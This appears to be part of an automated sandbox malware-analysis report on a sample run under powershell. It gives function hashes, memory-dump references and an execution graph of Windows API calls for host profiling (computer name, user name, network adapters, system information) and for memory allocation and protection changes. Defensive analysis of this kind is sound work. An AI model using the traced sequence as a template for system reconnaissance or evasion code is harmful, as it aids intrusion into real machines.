                                                                                                                                              • Opcode Fuzzy Hash: 5bc6046af708ad1a3953b508c5f8bdef07114cc6beab3fb6be8632ed970b1790
                                                                                                                                              • Instruction Fuzzy Hash: 87E0EC32740014975A0496AEB4158AEF7DFDFC9665319807FE60DC7350DE66DC038695
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07805E88 Relevance: .0, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2b515c2f6cf65f996123d05d6ff8c7ab0d98adf8a13ae2fa248a707d8e9c4413
                                                                                                                                              • Instruction ID: c5b2a9ce7c160c2267f7d7083dc49014459f3795671bc51642fc7af120b78328
                                                                                                                                              • Opcode Fuzzy Hash: 2b515c2f6cf65f996123d05d6ff8c7ab0d98adf8a13ae2fa248a707d8e9c4413
                                                                                                                                              • Instruction Fuzzy Hash: 7AE0207670864107CB15019E682496A7FD9CBC1561B1D40BBD40EC7382EE58CC0143F1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075A67FE Relevance: .0, Instructions: 21COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a40b48cdd42378caa51735f942b12cac72944f2146a1273e70b9dcc0571decb1
                                                                                                                                              • Instruction ID: a9e4d0dcd03852e3f58403fdae458683f8364890c197dd0d21e44ff5a4a0d843
                                                                                                                                              • Opcode Fuzzy Hash: a40b48cdd42378caa51735f942b12cac72944f2146a1273e70b9dcc0571decb1
                                                                                                                                              • Instruction Fuzzy Hash: 51D05E313000146B561496AEB80189ABBDEDFC9660318807EE90DC7340DE62DC0382E1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0780D6E0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 06a3561b66f965ab60a281235cb15431ec647ec499c6b87d3a4441fc31b58761
                                                                                                                                              • Instruction ID: 0d632c37f797b481081e4ac1e94632a20fdc91c48161993049d773682e03a130
                                                                                                                                              • Opcode Fuzzy Hash: 06a3561b66f965ab60a281235cb15431ec647ec499c6b87d3a4441fc31b58761
                                                                                                                                              • Instruction Fuzzy Hash: 5DD0C925145680AFD2028A11EF19ED63F38AF47974B0502D7F1448B6B3CA269A008AA2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 0780C5E8 Relevance: .6, Instructions: 567COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1a9b281115e44d1247f580078767bab47c5f6bbd6e0c37a18a26dcdfd129d88a
                                                                                                                                              • Instruction ID: 04b0ac5321ea13961c2787ad8c1007988d58064ae0273d34ca1ef8d13febac71
                                                                                                                                              • Opcode Fuzzy Hash: 1a9b281115e44d1247f580078767bab47c5f6bbd6e0c37a18a26dcdfd129d88a
                                                                                                                                              • Instruction Fuzzy Hash: 0A229F74A00205DFCB55DF68D854AAEBBB2FF89314F148569E806DB3A0DB34ED05CBA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07802751 Relevance: .4, Instructions: 350COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cdcf96ba2ddea6ac28545cfb0affa60e92825b34067651fb7cec01bbc90bd3a5
                                                                                                                                              • Instruction ID: 84f5fbcd2ea1e8f5e7f37358e44768a6e1177ce8ca473e73bceecf4fd73d92f9
                                                                                                                                              • Opcode Fuzzy Hash: cdcf96ba2ddea6ac28545cfb0affa60e92825b34067651fb7cec01bbc90bd3a5
                                                                                                                                              • Instruction Fuzzy Hash: 1AC1607078A340AFF725A730DC57B2A3E52ABC5B04F349469F6025F2D6CDA2A84297D4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07802760 Relevance: .4, Instructions: 350COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c295c61a3adf967fe4713e43ed6dd9f4b586d4ae658a5088d8bda869f1a99cf5
                                                                                                                                              • Instruction ID: ad20da462c08bf5940a68d5843ee040d203570c416514abc7925bec1ba9fbadb
                                                                                                                                              • Opcode Fuzzy Hash: c295c61a3adf967fe4713e43ed6dd9f4b586d4ae658a5088d8bda869f1a99cf5
                                                                                                                                              • Instruction Fuzzy Hash: D0C1707078A340AFF725A730EC57B2A3E529BC5B04F349469F6025F2D2CDB2A84297D4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:1.8%
                                                                                                                                              Dynamic/Decrypted Code Coverage:2.4%
                                                                                                                                              Signature Coverage:5.6%
                                                                                                                                              Total number of Nodes:1924
                                                                                                                                              Total number of Limit Nodes:3
                                                                                                                                              execution_graph 13627 1800160f0 13628 180016103 GetCurrentThreadId 13627->13628 13629 180016117 13627->13629 13628->13629 15489 180013870 GetCurrentThreadId 15490 180013882 15489->15490 15491 180013893 15489->15491 15490->15491 15493 1800138d0 15490->15493 15494 1800138f2 GetCurrentThreadId 15493->15494 15496 180013903 15493->15496 15494->15496 15495 180013ab4 15495->15491 15496->15496 15498 180052ce0 4 API calls 15496->15498 15500 180013a0d 15496->15500 15497 180013b13 GetCurrentThreadId 15499 180013b57 15497->15499 15514 180013c69 15497->15514 15498->15500 15502 18000ba90 99 API calls 15499->15502 15499->15514 15500->15495 15500->15497 15501 180013ca6 15501->15491 15503 180013b78 15502->15503 15505 18000ba90 99 API calls 15503->15505 15504 180013cbe GetCurrentThreadId 15507 180013cd3 15504->15507 15511 180013cfc 15504->15511 15506 180013b85 15505->15506 15508 18000ba90 99 API calls 15506->15508 15509 180010850 6 API calls 15507->15509 15507->15511 15510 180013baf 15508->15510 15509->15511 15512 180013bbf InitializeConditionVariable 15510->15512 15511->15491 15515 18002b700 15512->15515 15514->15501 15514->15504 15516 18002b72c GetCurrentThreadId 15515->15516 15517 18002b73d 15515->15517 15516->15517 15518 18002ad50 5 API calls 15517->15518 15519 18002b752 15518->15519 15520 18002ae90 106 API calls 15519->15520 15521 18002b7a7 15519->15521 15520->15521 15521->15514 15658 1800138b0 GetCurrentThreadId 14157 180004630 14158 180004648 14157->14158 14160 1800046c0 14157->14160 14159 1800080f0 77 API calls 14158->14159 14158->14160 14159->14160 14161 180005b30 14162 180007fb0 77 API calls 14161->14162 14163 180005b68 14162->14163 15659 18000e1b0 15660 18000e1bf 15659->15660 15663 18000e110 15660->15663 15662 18000e1cd 15664 18000e123 GetCurrentThreadId 15663->15664 15665 18000e134 15663->15665 15664->15665 15665->15662 13566 17523532758 13567 17523532769 13566->13567 13568 1752353275e SleepEx 13567->13568 13569 17523532772 13567->13569 13568->13567 14164 180013132 14165 180013163 14164->14165 14166 18000ba90 99 API calls 14165->14166 14167 180013176 14165->14167 14166->14167 14168 1800131f6 14167->14168 14169 18001327d 14167->14169 14171 180013333 14167->14171 14170 18000ba90 99 API calls 14169->14170 14173 180013286 14169->14173 14170->14173 14172 18001337c 14171->14172 14175 180010850 14171->14175 14176 180010877 GetCurrentThreadId 14175->14176 14177 180010888 14175->14177 14176->14177 14182 18002ad50 14177->14182 14179 18001089d 14181 1800108e2 14179->14181 14188 180023680 GetCurrentThreadId 14179->14188 14181->14172 14183 18002ad82 14182->14183 14187 18002add7 14182->14187 14184 18002ada4 14183->14184 14185 180023680 GetCurrentThreadId 14183->14185 14184->14187 14190 180052ce0 14184->14190 14185->14184 14187->14179 14189 180023699 14188->14189 14189->14181 14191 180052d56 14190->14191 14192 180052d02 14190->14192 14194 180052d5a GetTickCount64 14191->14194 14192->14191 14193 180052d0b QueryPerformanceCounter EnterCriticalSection 14192->14193 14195 180052d34 14193->14195 14196 180052d3e LeaveCriticalSection 14193->14196 14197 180052d89 14194->14197 14195->14196 14196->14194 14197->14187 15666 1800035b3 EnterCriticalSection 15667 18000360b 15666->15667 15668 180003651 LeaveCriticalSection 15666->15668 15667->15668 15670 180001570 VirtualAlloc 15667->15670 15670->15668 14198 180051a40 14199 180051af1 GetCurrentProcess EnterCriticalSection 14198->14199 14200 180051aa1 14198->14200 14213 180051830 14199->14213 14202 180051abe GetCurrentProcess 14200->14202 14203 180051aaa InitializeCriticalSection 14200->14203 14205 180051ae0 14202->14205 14203->14202 14206 180051c0f GetLastError FormatMessageA 14205->14206 14207 180051aeb 14205->14207 14210 180051c56 14206->14210 14207->14199 14208 180051bd9 LeaveCriticalSection 14211 180051be9 14208->14211 14209 180051b1f 14209->14208 14212 180051c8e LocalFree 14210->14212 14212->14211 14215 180051867 14213->14215 14214 180051903 14214->14209 14215->14214 14217 180051965 GetCurrentProcess 14215->14217 14221 180051a18 14215->14221 14216 180051a28 14216->14209 14218 180051985 14217->14218 14219 18005198e GetLastError FormatMessageA 14218->14219 14218->14221 14226 1800519d3 14219->14226 14220 180051af1 GetCurrentProcess EnterCriticalSection 14230 180051b1f 14220->14230 14221->14216 14221->14220 14222 180051abe GetCurrentProcess 14221->14222 14223 180051aaa InitializeCriticalSection 14221->14223 14225 180051ae0 14222->14225 14223->14222 14227 180051c0f GetLastError FormatMessageA 14225->14227 14228 180051aeb 14225->14228 14231 180051a0b LocalFree 14226->14231 14232 180051c56 14227->14232 14228->14220 14229 180051bd9 LeaveCriticalSection 14233 180051be9 14229->14233 14230->14229 14231->14221 14234 180051c8e LocalFree 14232->14234 14233->14209 14234->14233 15522 180010a80 15523 18000ba90 99 API calls 15522->15523 15524 180010aae 15523->15524 15525 180023d40 99 API calls 15524->15525 15526 180010ae7 15525->15526 15527 180022660 99 API calls 15526->15527 15528 180010b1e 15527->15528 15529 1800224f0 99 API calls 15528->15529 15530 180010b57 15529->15530 15531 18003bf40 77 API calls 15530->15531 15532 180010bde 15530->15532 15531->15532 14235 18000de40 14241 18000dd30 14235->14241 14237 18000de80 14238 18000de70 14238->14237 14239 18000dd30 108 API calls 14238->14239 14240 18000dec3 14239->14240 14242 18000dd69 GetCurrentThreadId 14241->14242 14244 18000dd7a 14241->14244 14242->14244 14244->14241 14245 18000ddee 14244->14245 14246 180022cf0 14244->14246 14245->14238 14250 180022d42 14246->14250 14248 180023170 103 API calls 14248->14250 14249 180022fa9 14249->14244 14250->14248 14250->14249 14251 180022f5d 14250->14251 14259 180023380 14250->14259 14251->14249 14253 180023ad0 14251->14253 14254 180023c03 14253->14254 14256 180023af9 14253->14256 14254->14249 14255 180052ce0 4 API calls 14257 180023b9a 14255->14257 14256->14255 14257->14254 14258 180023380 103 API calls 14257->14258 14258->14254 14268 180023170 GetCurrentThreadId 14259->14268 14261 1800233a3 14262 1800233ab GetCurrentThreadId 14261->14262 14267 18002341b 14261->14267 14263 1800233c2 14262->14263 14264 1800233eb GetCurrentThreadId 14263->14264 14265 1800233fb 14263->14265 14264->14265 14266 18000ba90 99 API calls 14265->14266 14266->14267 14267->14250 14269 180023195 14268->14269 14270 1800231b2 GetCurrentThreadId 14269->14270 14273 18002320b 14269->14273 14271 1800231c9 14270->14271 14272 180023380 101 API calls 14271->14272 14271->14273 14272->14273 14273->14261 15533 18000bd80 15536 18000bdf0 15533->15536 15535 18000bdce 15537 18000be2d 15536->15537 15538 18000ba90 99 API calls 15537->15538 15539 18000bee4 15537->15539 15540 18000be46 15538->15540 15539->15535 15541 18000be56 K32EnumProcessModules 15540->15541 15541->15539 15543 18000be74 15541->15543 15543->15539 15544 18000bf30 15543->15544 15547 18000bf60 15544->15547 15545 18000ba90 99 API calls 15545->15547 15546 18000bf8c GetModuleFileNameW 15546->15547 15551 18000bfaf 15546->15551 15547->15545 15547->15546 15548 18000bfad 15547->15548 15549 18000bfa0 GetLastError 15547->15549 15550 18000ba90 99 API calls 15548->15550 15549->15547 15549->15548 15550->15551 15551->15543 15552 180004a80 15553 180004a90 15552->15553 15554 1800080f0 77 API calls 15553->15554 15555 180004c74 15553->15555 15557 180004ad0 15554->15557 15556 180004aef EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection EnterCriticalSection 15559 180004bbe 15556->15559 15557->15555 15557->15556 15558 180004c4a LeaveCriticalSection 15558->15555 15559->15558 15560 180004d06 EnterCriticalSection 15559->15560 15561 180004c90 LeaveCriticalSection 15559->15561 15560->15559 15561->15559 14274 180051d50 14275 180051d7e 14274->14275 14278 180051e80 14275->14278 14277 180051dd7 14279 180051ecb 14278->14279 14280 180051f14 14279->14280 14281 180051f4a 14279->14281 14283 1800e94c4 77 API calls 14279->14283 14280->14277 14282 180051f7a 14281->14282 14287 180051590 14281->14287 14282->14277 14285 180051f8f 14283->14285 14285->14281 14286 1800e959b 77 API calls 14285->14286 14286->14281 14288 1800515ed 14287->14288 14289 1800515d9 InitializeCriticalSection 14287->14289 14290 180051648 GetCurrentThread 14288->14290 14291 1800515fa GetThreadId GetCurrentThreadId 14288->14291 14289->14288 14292 180051653 14290->14292 14299 18005167e 14290->14299 14293 180051610 14291->14293 14291->14299 14295 180051670 RtlCaptureContext 14292->14295 14294 180051636 GetThreadContext 14293->14294 14293->14295 14297 180051646 14294->14297 14294->14299 14295->14299 14296 18005173d RtlLookupFunctionEntry 14298 18005174e RtlVirtualUnwind 14296->14298 14296->14299 14297->14282 14298->14297 14298->14299 14299->14296 14299->14297 13573 175235328d4 13576 17523532c20 13573->13576 13575 175235328dd 13577 17523532c3c SleepEx 13576->13577 13577->13577 13578 17523532c60 13577->13578 13583 175235324ac 13578->13583 13582 17523532ca5 13582->13575 13584 175235324cd RtlAllocateHeap 13583->13584 13585 175235324ed 13584->13585 13593 175235325a2 13584->13593 13598 1752353227c 13585->13598 13589 1752353257b 13607 1752353112c GetComputerNameExW 13589->13607 13593->13582 13594 17523532b3c 13593->13594 13596 17523532b71 13594->13596 13595 17523532bd6 SleepEx 13595->13596 13596->13595 13597 17523532be3 13596->13597 13597->13582 13600 17523532293 13598->13600 13599 175235322bd NtQuerySystemInformation 13599->13600 13601 1752353231f 13599->13601 13600->13599 13600->13601 13602 1752353230a RtlAllocateHeap 13600->13602 13603 17523531598 13601->13603 13602->13600 13604 175235315c1 13603->13604 13619 175235323ac 13604->13619 13608 17523531176 13607->13608 13609 17523531192 GetUserNameW 13608->13609 13610 175235311b5 13609->13610 13623 1752353277c 13610->13623 13613 17523532610 LoadLibraryA 13614 17523532654 13613->13614 13615 1752353265c GetAdaptersInfo 13614->13615 13618 1752353269f 13614->13618 13616 1752353266a 13615->13616 13615->13618 13617 17523532691 GetAdaptersInfo 13616->13617 13616->13618 13617->13618 13618->13593 13620 175235323c2 13619->13620 13621 175235323e6 GetNativeSystemInfo 13620->13621 13622 17523531693 13620->13622 13621->13622 13622->13589 13624 175235327ac 13623->13624 13625 175235327b4 LookupAccountNameW 13624->13625 13626 175235311fa 13624->13626 13625->13626 13626->13613 14300 18003e450 14301 18003e493 14300->14301 14302 18003e559 14300->14302 14313 18003ed10 14301->14313 14303 1800e94c4 77 API calls 14302->14303 14305 18003e565 14303->14305 14305->14301 14306 1800e959b 77 API calls 14305->14306 14306->14301 14307 18003e535 14308 18003e51b 14308->14307 14309 180022750 99 API calls 14308->14309 14310 18003e613 14309->14310 14323 18003e7d0 14310->14323 14312 18003e646 14314 18003edb4 GetCurrentThreadId 14313->14314 14315 18003edc5 14313->14315 14314->14315 14330 18003ee70 14315->14330 14318 18003ee23 14319 180023170 103 API calls 14318->14319 14320 18003f130 14318->14320 14321 18003ee57 14318->14321 14322 180023380 103 API calls 14318->14322 14319->14318 14320->14321 14337 18003f610 14320->14337 14321->14308 14322->14318 14512 18003b990 14323->14512 14325 18003e7fb 14326 180022750 99 API calls 14325->14326 14327 18003e85c 14325->14327 14326->14327 14329 18003e89b 14327->14329 14521 18003ea60 14327->14521 14329->14312 14332 18003eec5 14330->14332 14331 18003f610 175 API calls 14333 18003f195 14331->14333 14332->14333 14334 180023170 103 API calls 14332->14334 14335 18003f130 14332->14335 14336 180023380 103 API calls 14332->14336 14333->14318 14334->14332 14335->14331 14335->14333 14336->14332 14340 18003f743 14337->14340 14341 18003f639 14337->14341 14338 18003f753 14338->14321 14339 180052ce0 4 API calls 14344 18003f6da 14339->14344 14340->14338 14346 18003ff90 14340->14346 14341->14339 14343 18003f781 14343->14321 14344->14340 14345 180023380 103 API calls 14344->14345 14345->14340 14347 18003ffc3 14346->14347 14348 180040048 14346->14348 14351 18003fff0 VirtualProtect 14347->14351 14355 18004000a 14347->14355 14349 1800e94c4 77 API calls 14348->14349 14350 180040054 14349->14350 14350->14347 14352 18004005c GetSystemInfo 14350->14352 14351->14351 14351->14355 14354 1800e959b 77 API calls 14352->14354 14353 180040037 14353->14343 14354->14347 14355->14353 14356 1800400b7 14355->14356 14357 1800400b0 14355->14357 14370 180044bf0 14356->14370 14361 1800400e0 14357->14361 14360 1800400b5 14360->14343 14362 18004010f NtQueryVirtualMemory 14361->14362 14365 1800401e6 14361->14365 14363 1800401e8 RtlNtStatusToDosError RtlSetLastWin32Error 14362->14363 14364 18004014b 14362->14364 14363->14365 14364->14365 14366 180040177 GetProcAddress 14364->14366 14365->14360 14366->14365 14367 180040189 NtQueryVirtualMemory 14366->14367 14367->14363 14368 1800401b5 14367->14368 14368->14365 14385 180040220 14368->14385 14371 180044c1f NtQueryVirtualMemory 14370->14371 14375 180044cf6 14370->14375 14372 180044cf8 RtlNtStatusToDosError RtlSetLastWin32Error 14371->14372 14373 180044c5b 14371->14373 14372->14375 14373->14375 14378 180044c87 GetProcAddress 14373->14378 14374 180044d18 14374->14360 14375->14374 14376 180044d57 14375->14376 14377 180044d50 14375->14377 14381 180044bf0 160 API calls 14376->14381 14379 1800400e0 160 API calls 14377->14379 14378->14375 14380 180044c99 NtQueryVirtualMemory 14378->14380 14382 180044d55 14379->14382 14380->14372 14383 180044cc5 14380->14383 14381->14382 14382->14360 14383->14375 14384 180040220 155 API calls 14383->14384 14384->14375 14386 18004025f GetModuleHandleW 14385->14386 14387 1800405e7 14385->14387 14389 180040284 14386->14389 14391 18004033f 14386->14391 14400 180040660 14387->14400 14390 1800402b4 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 14389->14390 14394 180040409 14389->14394 14390->14391 14390->14394 14392 18004037d VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 14391->14392 14391->14394 14392->14394 14393 1800405a2 14396 1800405a5 GetModuleHandleW 14393->14396 14394->14393 14397 1800404dc 14394->14397 14398 18004044f VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 14394->14398 14395 18004062c 14395->14365 14396->14387 14397->14393 14397->14396 14399 180040518 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 14397->14399 14398->14396 14398->14397 14399->14396 14401 180040689 14400->14401 14413 180042570 14401->14413 14403 180040737 EnterCriticalSection 14434 180043680 14403->14434 14404 180040858 14404->14395 14406 1800e94c4 77 API calls 14410 180040709 14406->14410 14407 180040759 LeaveCriticalSection 14407->14410 14408 180040882 InitializeCriticalSectionEx 14409 1800e959b 77 API calls 14408->14409 14409->14410 14410->14403 14410->14404 14410->14406 14410->14408 14411 180040802 VirtualProtect 14410->14411 14412 18004082f VirtualProtect 14410->14412 14411->14410 14412->14410 14414 180042658 14413->14414 14424 1800425a8 14413->14424 14415 1800e94c4 77 API calls 14414->14415 14417 180042664 14415->14417 14418 18004266c GetSystemInfo 14417->14418 14417->14424 14421 1800e959b 77 API calls 14418->14421 14420 1800425d3 EnterCriticalSection 14447 1800428c0 14420->14447 14421->14424 14422 1800e94c4 77 API calls 14425 18004269e 14422->14425 14439 1800426e0 14424->14439 14425->14420 14427 1800426a6 InitializeCriticalSectionEx 14425->14427 14426 1800425f1 14428 180042608 LeaveCriticalSection 14426->14428 14460 180042f30 14426->14460 14430 1800e959b 77 API calls 14427->14430 14432 180042648 14428->14432 14433 1800426d1 14430->14433 14432->14410 14433->14420 14503 1800437d0 14434->14503 14437 18004370b 14437->14407 14438 1800436bf VirtualProtect 14438->14437 14442 18004270c 14439->14442 14440 1800425c5 14440->14420 14440->14422 14441 1800e94c4 77 API calls 14441->14442 14442->14440 14442->14441 14443 18004285b GetSystemInfo 14442->14443 14445 180042895 GetSystemInfo 14442->14445 14444 1800e959b 77 API calls 14443->14444 14444->14442 14446 1800e959b 77 API calls 14445->14446 14446->14442 14448 1800428ec 14447->14448 14449 180042917 14448->14449 14451 18000ba90 99 API calls 14448->14451 14459 18004297e 14448->14459 14450 180042a0a 14449->14450 14455 18004291f 14449->14455 14452 18000ba90 99 API calls 14450->14452 14450->14459 14451->14449 14453 180042a1b 14452->14453 14453->14459 14474 180042cc0 14453->14474 14454 18000ba90 99 API calls 14456 18004299b 14454->14456 14455->14454 14455->14459 14468 180042af0 14456->14468 14459->14426 14463 180042f50 14460->14463 14461 180042f68 GetCurrentProcess 14482 180043020 14461->14482 14462 180042fca 14462->14428 14463->14461 14463->14462 14464 1800e94c4 77 API calls 14463->14464 14466 180042ff0 GetSystemInfo 14463->14466 14464->14463 14467 1800e959b 77 API calls 14466->14467 14467->14463 14469 180042b88 14468->14469 14470 180042b39 14468->14470 14471 180042cc0 99 API calls 14469->14471 14473 180042b4f 14469->14473 14472 180042cc0 99 API calls 14470->14472 14470->14473 14471->14473 14472->14473 14473->14459 14478 180042cd6 14474->14478 14475 180042d66 14477 18000ba90 99 API calls 14475->14477 14476 180042f20 14481 180042db7 14477->14481 14478->14475 14478->14476 14480 180042ce0 14478->14480 14479 18000ba90 99 API calls 14479->14481 14480->14476 14480->14479 14481->14459 14497 180043058 14482->14497 14483 1800430e9 VirtualAlloc 14484 180043104 GetLastError 14483->14484 14483->14497 14484->14497 14485 18004331a 14485->14463 14486 1800e94c4 77 API calls 14486->14497 14487 180043131 VirtualAlloc 14487->14497 14489 1800e959b 77 API calls 14489->14497 14490 180043171 VirtualAlloc 14490->14497 14491 180043390 81 API calls 14491->14497 14492 1800431b1 VirtualAlloc 14492->14497 14493 1800431f1 VirtualAlloc 14493->14497 14494 180043231 VirtualAlloc 14494->14497 14495 180043271 VirtualAlloc 14495->14497 14496 1800432a9 VirtualAlloc 14496->14497 14497->14483 14497->14485 14497->14486 14497->14487 14497->14489 14497->14490 14497->14491 14497->14492 14497->14493 14497->14494 14497->14495 14497->14496 14498 1800432e1 VirtualAlloc 14497->14498 14499 180043620 LoadLibraryW 14497->14499 14498->14497 14500 180043645 GetProcAddress 14499->14500 14501 18004366a 14499->14501 14500->14501 14502 18004365a FreeLibrary 14500->14502 14501->14497 14502->14501 14506 1800437f1 14503->14506 14504 1800436b7 14504->14437 14504->14438 14505 180043815 VirtualAlloc 14505->14506 14506->14504 14506->14505 14507 1800e94c4 77 API calls 14506->14507 14508 180043882 GetSystemInfo 14506->14508 14510 1800438b8 GetSystemInfo 14506->14510 14507->14506 14509 1800e959b 77 API calls 14508->14509 14509->14506 14511 1800e959b 77 API calls 14510->14511 14511->14506 14513 18003b9b9 14512->14513 14518 18003ba02 14512->14518 14514 18003ba3c 14513->14514 14516 18003ba9c 14513->14516 14513->14518 14536 1800a0650 14514->14536 14517 18000ba90 99 API calls 14516->14517 14516->14518 14517->14518 14520 18003bae3 14518->14520 14540 1800522f0 14518->14540 14520->14325 14522 18003eaa4 14521->14522 14525 18003ecf8 14521->14525 14523 18003eadd 14522->14523 14522->14525 14529 18003eaed 14522->14529 14524 18000ba90 99 API calls 14523->14524 14524->14529 14526 18003edb4 GetCurrentThreadId 14525->14526 14527 18003edc5 14525->14527 14526->14527 14528 18003ee70 175 API calls 14527->14528 14534 18003ee23 14528->14534 14529->14329 14530 18003f610 175 API calls 14532 18003ee57 14530->14532 14531 180023170 103 API calls 14531->14534 14532->14329 14533 18003f130 14533->14530 14533->14532 14534->14531 14534->14532 14534->14533 14535 180023380 103 API calls 14534->14535 14535->14534 14537 1800a0659 14536->14537 14546 1800a0820 14537->14546 14541 18005232e 14540->14541 14542 180052ce0 4 API calls 14541->14542 14545 180052362 14541->14545 14543 18005235d 14542->14543 14553 180052da0 GetCurrentProcess GetProcessTimes 14543->14553 14545->14520 14547 1800a0835 14546->14547 14550 1800eb0a0 14547->14550 14551 1800f55a0 77 API calls 14550->14551 14552 1800a0667 14551->14552 14552->14518 14557 180052de3 14553->14557 14554 1800e94c4 77 API calls 14554->14557 14555 180052e06 GetSystemTimeAsFileTime 14555->14557 14556 180052e3a 14556->14545 14557->14554 14557->14555 14557->14556 14559 1800e959b 77 API calls 14557->14559 14560 180052e80 LoadLibraryW 14557->14560 14559->14557 14561 180052ea5 GetProcAddress 14560->14561 14562 180052eca 14560->14562 14561->14562 14563 180052eba FreeLibrary 14561->14563 14562->14557 14563->14562 15562 180030690 15565 180030780 15562->15565 15564 1800306cf 15569 18003079b 15565->15569 15566 180030891 15570 180004410 77 API calls 15566->15570 15571 1800307bf 15566->15571 15567 18003091e 15568 180004410 77 API calls 15567->15568 15568->15571 15569->15566 15569->15567 15569->15571 15570->15571 15571->15564 15671 18003c5d0 15672 18003c600 15671->15672 15675 18003c633 15671->15675 15672->15675 15678 18003c730 15672->15678 15673 1800e94c4 77 API calls 15673->15675 15675->15673 15676 1800e959b 77 API calls 15675->15676 15677 18003c68f 15675->15677 15676->15675 15679 18003c7a2 GetCurrentThreadId 15678->15679 15680 18003c7b3 15678->15680 15679->15680 15686 18003dc10 15680->15686 15682 18003c80b 15683 18003c83f 15682->15683 15684 180022750 99 API calls 15682->15684 15683->15675 15685 18003c8b9 15684->15685 15685->15675 15690 18003dc65 15686->15690 15688 180023170 103 API calls 15688->15690 15689 18003dead 15692 18003df09 15689->15692 15693 18003e2f0 15689->15693 15690->15688 15690->15689 15691 180023380 103 API calls 15690->15691 15690->15692 15691->15690 15692->15682 15696 18003e423 15693->15696 15697 18003e319 15693->15697 15694 18003e433 15694->15692 15695 180052ce0 4 API calls 15700 18003e3ba 15695->15700 15696->15694 15698 18003e493 15696->15698 15699 1800e94c4 77 API calls 15696->15699 15697->15695 15701 18003ed10 176 API calls 15698->15701 15703 18003e565 15699->15703 15700->15696 15702 180023380 103 API calls 15700->15702 15706 18003e51b 15701->15706 15702->15696 15703->15698 15704 1800e959b 77 API calls 15703->15704 15704->15698 15705 18003e535 15705->15692 15706->15705 15707 180022750 99 API calls 15706->15707 15708 18003e613 15707->15708 15709 18003e7d0 182 API calls 15708->15709 15710 18003e646 15709->15710 15710->15692 14564 180029650 14565 18002966a 14564->14565 14570 180029689 14564->14570 14566 180029698 14565->14566 14567 18002967c 14565->14567 14571 180029900 14566->14571 14569 180029900 77 API calls 14567->14569 14567->14570 14569->14570 14570->14570 14572 180029945 14571->14572 14573 180004410 77 API calls 14572->14573 14574 180029973 14572->14574 14573->14574 14574->14570 15572 18002a390 15574 18002a3a6 15572->15574 15573 18002a43e 15575 180004410 77 API calls 15573->15575 15574->15573 15576 18002a3b3 15574->15576 15578 18002a475 15574->15578 15575->15578 15577 180004410 77 API calls 15576->15577 15576->15578 15577->15578 15711 18002a0d0 15712 18002a0ea 